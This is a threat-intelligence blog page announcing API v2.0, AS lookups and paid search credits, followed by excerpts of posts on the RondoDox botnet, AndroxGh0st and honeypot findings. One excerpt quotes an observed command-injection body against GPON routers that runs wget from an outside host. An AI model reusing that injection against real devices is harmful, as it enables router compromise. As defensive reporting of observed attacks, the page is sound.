Skip to main content

New Release, Enhanced Search Features, New API and More!

Today we are announcing changes and the addition of features to our site. We are happy introduce first and last timestamps per data source, tags, a new results UI, AS lookups and version 2.0 of the API. Below is an example of the additional fields and tags that are that are returned for an IP address search:


When searching for an Autonomous System (AS), which requires authentication, the response contains similar first and last seen timestamps, but also a tag if the AS is frequently abused. Pagination exists for larger numbers of results and each page of 25 IP addresses will consume one API quota credit:


Version 2.0 of the API has also been overhauled to include first and last timestamps, geolocation information, and AS information in the response, none of which were included in API version 1.0.


POST /api/getip response (version 1.0)



POST /api/v2/getip
 response (version 2.0)

API version 1.0 will not cease to exist. We will continue monitor the use of the version 1.0 endpoint (/api/getip) and may deprecate it in the future.

API queries, bulksearches and extended search queries such as AS lookups have been folded into a single search quota. IP address searches are still available while unauthenticated and are subject to rate limits like before. New users will still be given 1,000 credits for free during registration. To the extent users require additional credits, we now offer paid options via a Stripe payment page. You will notice under the Account page that there are options to purchase additional credits. The buttons will link to an external Stripe payment page:


Upon completion of the Stripe payment, you will be redirected back to your account page that will reflect your updated quota.

To the extent that you are interested in additional query quota for research or academic purposes, please email info@sicehice.com with your name, LinkedIn profile, an overview of your project, and your intended search usage. Additional quota can be granted for free on a case-by-case basis. 

Comments

Popular posts from this blog

RondoDox Botnet: Rando In Your Router

The RondoDox botnet is a network of compromised Internet-connected devices, including MIPS-based embedded systems such as routers and IoT devices. Our honeypot data has observed attempts by RondoDox to compromise  systems, demonstrating exploitation of vulnerabilities or weak credentials to gain control over devices that can then be used for activities like DDoS attacks, spam campaigns, credential stuffing, or illicit cryptocurrency mining. Since June 2025, Sicehice has seen an uptick in exploitation of common router CVEs that lead to RondoDox botnet infections. The malware itself infects the target device with a dropper-like shell script which facilitates the download of a final stage payload. Sicehice observed the first evidence of RondoDox as early as 2025-06-04 02:43:31. The following source IP addresses are the origination point of the activity: IP AS Country 45.135.194.11 AS 51396 (Pfcloud UG) The Netherlands (NL) 45.135.194.34 AS 51396 (Pfcloud UG) The Netherlands (NL) ...

AndroxGh0st – Stealing your AWS Key Pairs for Simple Email Service

AndroxGh0st is a family of malware written in Python that notoriously targets Laravel .env files. Since the inception of our new fleet of web honeypots deployed in December 2021, Sicehice has detected this activity and observed tens of thousands of requests with the HTTP POST body set to 0x[]=androxgh0st . Searching this string on GitHub yields various repositories, many of which help identify AWS secrets inadvertently exposed by the Laravel framework. One feature of AndroxGh0st is the ability to search for exposed AWS credentials, namely looking for AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY identifiers. While individuals may mistakenly leak their key pairs to version control repositories such as GitHub, GitLab, or BitBucket, there is always the possibility of inadvertently leaking key pairs directly on web servers as well. AWS has gone through efforts to continually scan GitHub for AWS key pairs and automatically apply the AWS managed policy AWSCompromi...

300 Days of New Web Honeypots

During December 2021, we deployed a new fleet of custom web honeypots written in Python Flask. The ongoing detections have been incorporated into our database as of January 3, 2022 and we are also pushing our detection feed to VirusTotal Collections . Approaching one year of of collections, here are some observations and stats: Locations where sensors are deployed: Sydney, AU Madrid, ES Amsterdam, NL Moscow, RU (which was forcibly shutdown due to sanctions imposed as a result of the 2022 Russian invasion of Ukraine) Chicago, US New Jersey, US Iowa, US We observed nearly 500,000 requests from over 38,000 unique IPs. A majority of the malware payloads we have observed are related to the Mozi botnet. You can find the related indicators shared on Abuse.ch ThreatFox here.   An example of this exploit observed in the POST body which targets GPON home routers (CVE-2018-10561) is as follows: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://221.205.75.24...